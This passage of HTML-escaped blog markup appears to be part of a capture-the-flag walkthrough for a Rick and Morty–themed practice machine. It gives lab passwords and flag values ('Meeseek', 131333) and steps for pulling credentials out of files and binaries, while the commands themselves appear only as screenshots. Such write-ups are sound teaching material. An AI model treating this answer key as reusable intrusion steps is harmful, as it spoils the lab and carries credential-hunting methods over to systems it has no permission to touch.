alt=&quot;&quot; data-original-height=&quot;117&quot; data-original-width=&quot;787&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEtaF0uAIvn6APHhs2SUvohx0mPn7k7_FqdnGBA1Q920sEtUWdSKDQj55Z5DHkHvrbqfoEiFWdmTvBrKo43JzupYG-P89LA8_CDyawUT_sRHvLva3NDAr4uX-4eotW_tj2A9UhW6ayFlcA/s16000/screenshot.47.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIuOWsIRan37Ja1PvaHhzEGpjtDFUfgNTPz_E2rP-iPWdZn6tRKU-UofJDfC3hcWR1qbkw3jh6Mjbtk0eVDbin0f9APeG9Qp-5f47-wot3vGKmpr36_BnGOVZ2M1ObBJyUqEW0YbRhiztM/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;117&quot; data-original-width=&quot;687&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIuOWsIRan37Ja1PvaHhzEGpjtDFUfgNTPz_E2rP-iPWdZn6tRKU-UofJDfC3hcWR1qbkw3jh6Mjbtk0eVDbin0f9APeG9Qp-5f47-wot3vGKmpr36_BnGOVZ2M1ObBJyUqEW0YbRhiztM/s16000/screenshot.48.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqVGBaZku8pl_tc36tEXVuzlILLqCL4_HZm-axx3kYauskELtvcy3WIrkrMLn-P3rqAz7717waCnVqgqeQwXEkrqzIaM482ciw4UbK8YFUu6DVIPxLbW7ifltqYJgr3loCrWdaqHOl_Zqr/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;95&quot; data-original-width=&quot;760&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqVGBaZku8pl_tc36tEXVuzlILLqCL4_HZm-axx3kYauskELtvcy3WIrkrMLn-P3rqAz7717waCnVqgqeQwXEkrqzIaM482ciw4UbK8YFUu6DVIPxLbW7ifltqYJgr3loCrWdaqHOl_Zqr/s16000/screenshot.50.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjunS3drgORcTvFofkEzzk_8HrnylLMgl3ES5mrp4pdfH_SfgR5z-adP_nKfzN0r1N-ncbmB1eWz0Db1nL8A21OfJKwOpTUsd_CZ8p7NEd9VnueSumIWvORf4MaYDZRNxeLTl4Sg-qX_dgm/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;115&quot; data-original-width=&quot;681&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjunS3drgORcTvFofkEzzk_8HrnylLMgl3ES5mrp4pdfH_SfgR5z-adP_nKfzN0r1N-ncbmB1eWz0Db1nL8A21OfJKwOpTUsd_CZ8p7NEd9VnueSumIWvORf4MaYDZRNxeLTl4Sg-qX_dgm/s16000/screenshot.51.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Transfer is successful:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje20u-4RrKDcYlliMxPrnoO2cD0EyMtb4FkKf5YTYLQYFMKxg5pCwegokPM7CODJEve7j-pHHQulLdk63-Kl_o3sfYsyIUT7hYoq9y44on6Z0F8doxxetd7JWGY8b9gWKjgOQnN289Pwxb/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;228&quot; data-original-width=&quot;867&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje20u-4RrKDcYlliMxPrnoO2cD0EyMtb4FkKf5YTYLQYFMKxg5pCwegokPM7CODJEve7j-pHHQulLdk63-Kl_o3sfYsyIUT7hYoq9y44on6Z0F8doxxetd7JWGY8b9gWKjgOQnN289Pwxb/s16000/screenshot.52.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Applying command&amp;nbsp;&lt;b&gt;strings&amp;nbsp;&lt;/b&gt;over the picture &lt;b&gt;Safe_password.jpg&lt;/b&gt; we discover password&lt;b&gt; Meeseek, &lt;/b&gt;needed for opening&amp;nbsp;&lt;b&gt;journal.txt.zip:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIB6ab_5YNQT3hrMGA-MpkEGTayP794-bBO_H-bbmVA5wafn-ZYIXZxHKthyphenhyphenBfneKmQF5UA9z-EOltMngR4OH0k-5vA0BMIAMRntEchXYNZdVHveXz235VbAE8Z71YnVWAY6sd4498uGeI/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;114&quot; data-original-width=&quot;821&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIB6ab_5YNQT3hrMGA-MpkEGTayP794-bBO_H-bbmVA5wafn-ZYIXZxHKthyphenhyphenBfneKmQF5UA9z-EOltMngR4OH0k-5vA0BMIAMRntEchXYNZdVHveXz235VbAE8Z71YnVWAY6sd4498uGeI/s16000/screenshot.55.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Unzipping with password &lt;b&gt;Meeseek&lt;/b&gt; we find a 20 points &lt;b&gt;FLAG (80/130)&lt;/b&gt;. It says that the flag &lt;b&gt;131333&lt;/b&gt; could be a &lt;b&gt;safe password&lt;/b&gt;, and interesting hint for later:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix6HBiwCtvG_tLzxKiMc6Ieh9IAU3vmfqCBKNeaVS0cZGzvIjPwJrQkkHkPA81GcrurjlFkRXbvNlCkO4DhWw39WYYCgax_ilQQmkD_F3XpWKBl60w_DeHXYdeLM41i5bckZmTRq4R1jbi/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;254&quot; data-original-width=&quot;580&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix6HBiwCtvG_tLzxKiMc6Ieh9IAU3vmfqCBKNeaVS0cZGzvIjPwJrQkkHkPA81GcrurjlFkRXbvNlCkO4DhWw39WYYCgax_ilQQmkD_F3XpWKBl60w_DeHXYdeLM41i5bckZmTRq4R1jbi/s16000/screenshot.56.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, let&#39;s explore user &lt;b&gt;RickSanchez&lt;/b&gt;&#39;s home folder:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiszud_ucBgm3FgbrBnKQh1ncziekPxvH2xZvKwM1sB2E6r-w4e0y_kIC025tgBbq2guwdiP7BXzsiiEc88E9jxK9wP4XzgtzN-nNcnLtlOcCZ8tQGKWCoiKkfIdy1BpnQLCOtQ8nJP0xey/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;235&quot; data-original-width=&quot;886&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiszud_ucBgm3FgbrBnKQh1ncziekPxvH2xZvKwM1sB2E6r-w4e0y_kIC025tgBbq2guwdiP7BXzsiiEc88E9jxK9wP4XzgtzN-nNcnLtlOcCZ8tQGKWCoiKkfIdy1BpnQLCOtQ8nJP0xey/s16000/screenshot.58.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- There is the executable file &lt;b&gt;safe&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00i1vbGsbFYtAdOWloVTTWLJYEx-pnVzboGQKpGkI58mnnYz5PwYUMuw0-LcRJKGZZILiKBv8WrJtn2g3MTAvbeIUzHKuraYSrRoqCFuHggcJf9CtNJ8Wv2eXgBuRHxgIHbWUoTvk7ybw/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;213&quot; data-original-width=&quot;688&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh00i1vbGsbFYtAdOWloVTTWLJYEx-pnVzboGQKpGkI58mnnYz5PwYUMuw0-LcRJKGZZILiKBv8WrJtn2g3MTAvbeIUzHKuraYSrRoqCFuHggcJf9CtNJ8Wv2eXgBuRHxgIHbWUoTvk7ybw/s16000/screenshot.60.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX1YzqrB0mu37_wfr88_CMIilQb4GLsjxYWHfId-gcY9D8m82-cyJgDuOxOh8f0QRm3S6P5oNg_BOi-sCNJVWVKfZO2-n03wbCk_WnU3KIuE2yFJrPWLeXzQ7e5_tZTXQLd5h9rjcpXL5C/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;49&quot; data-original-width=&quot;626&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX1YzqrB0mu37_wfr88_CMIilQb4GLsjxYWHfId-gcY9D8m82-cyJgDuOxOh8f0QRm3S6P5oNg_BOi-sCNJVWVKfZO2-n03wbCk_WnU3KIuE2yFJrPWLeXzQ7e5_tZTXQLd5h9rjcpXL5C/s16000/screenshot.61.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- However it&#39;s not possible to run it:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYysN_H2Ho0Lp1DYEyB4bvsNypvJYTx9EFrEwrIax20HHJzuc67w0h9t1P03dl8AR-WdpifEoQbbuWKcta8bbiG1rUp_CCmWvsZEAQBx-bnBzlTeaJJQ1X9UixKza33YjoGiQjbaQ6vzky/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;92&quot; data-original-width=&quot;698&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYysN_H2Ho0Lp1DYEyB4bvsNypvJYTx9EFrEwrIax20HHJzuc67w0h9t1P03dl8AR-WdpifEoQbbuWKcta8bbiG1rUp_CCmWvsZEAQBx-bnBzlTeaJJQ1X9UixKza33YjoGiQjbaQ6vzky/s16000/screenshot.63.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Let&#39;s transfer&lt;b&gt; safe&lt;/b&gt; to Kali:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZiy2UL8UNmAEtLVbX0wewhSKBQ9uFHOrtC0RsonLnf8By1IHBix3RL2oRmEX97K5aihYdlMouzra6PAHusg14B4R9Z6iubrQfdAsMT2a65HUu5w5KE8xWBKxdC6TbHqczirBgrKNnU0qs/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;94&quot; data-original-width=&quot;689&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZiy2UL8UNmAEtLVbX0wewhSKBQ9uFHOrtC0RsonLnf8By1IHBix3RL2oRmEX97K5aihYdlMouzra6PAHusg14B4R9Z6iubrQfdAsMT2a65HUu5w5KE8xWBKxdC6TbHqczirBgrKNnU0qs/s16000/screenshot.65.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwJNlsffshyxYLZAEZgnPAwf_90RVBeeKQVLnLrCUlAsQcA0emL1CHJJjpBZSlchl8myPqHsuaHhEzCSBDXdpS5NzQI_tPv9uAt-7PB6xqXMFjTAQEQEDLPwcXIb-CP2qH95VBUj0_bsYc/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;70&quot; data-original-width=&quot;680&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwJNlsffshyxYLZAEZgnPAwf_90RVBeeKQVLnLrCUlAsQcA0emL1CHJJjpBZSlchl8myPqHsuaHhEzCSBDXdpS5NzQI_tPv9uAt-7PB6xqXMFjTAQEQEDLPwcXIb-CP2qH95VBUj0_bsYc/s16000/screenshot.66.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running &lt;b&gt;./safe&lt;/b&gt;, it seems some argument is needed:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeg5LoQDVhmx0lEzJozTWU5m2bhTfIkEoq_eshNh5KrtyK8WbJWOqvrpjJRXrdbW9Y6ggP4GFvk1bCeSivDKjKecbUpBZV5Dg64YNf6Mgw21NiNepBae6rkF7laS5GB5OJNI0NMlstV-Ch/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;114&quot; data-original-width=&quot;1083&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeg5LoQDVhmx0lEzJozTWU5m2bhTfIkEoq_eshNh5KrtyK8WbJWOqvrpjJRXrdbW9Y6ggP4GFvk1bCeSivDKjKecbUpBZV5Dg64YNf6Mgw21NiNepBae6rkF7laS5GB5OJNI0NMlstV-Ch/s16000/screenshot.67.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Inputing flag 131333 we discover a 20 points &lt;b&gt;FLAG (100/130 points).&lt;/b&gt; Also, some directions to find &lt;b&gt;RickSanchez&lt;/b&gt;&#39;s password:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ08LwZSxqY2CrCysB0n84bNzyP6Cuk4h0w1G9dTrbvSo9G1zfu_HS9fysa3pt0ZZaZT7fHKrrY0d8EEc93j1ZNE8rqwVnezECT-Y2KWCPl8oUJAi8Txvpb8Zt4jI9xd_6Ngtz3rO2u4vj/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;277&quot; data-original-width=&quot;874&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ08LwZSxqY2CrCysB0n84bNzyP6Cuk4h0w1G9dTrbvSo9G1zfu_HS9fysa3pt0ZZaZT7fHKrrY0d8EEc93j1ZNE8rqwVnezECT-Y2KWCPl8oUJAi8Txvpb8Zt4jI9xd_6Ngtz3rO2u4vj/s16000/screenshot.68.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The other folder does not contain flags:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-7_vbP_bH39yhJpb1aR1IWlbqqMPqrmCkm6KMclvmahMN58203P_ObSqjaIRVoofD-pmbpduDXqBFaychnstytsPshdAJfeRbBv4ZWl4sL7wBaPVwLzprwpwWCutgJtfrwjZzYuv_m2AY/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;453&quot; data-original-width=&quot;708&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-7_vbP_bH39yhJpb1aR1IWlbqqMPqrmCkm6KMclvmahMN58203P_ObSqjaIRVoofD-pmbpduDXqBFaychnstytsPshdAJfeRbBv4ZWl4sL7wBaPVwLzprwpwWCutgJtfrwjZzYuv_m2AY/s16000/screenshot.70.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 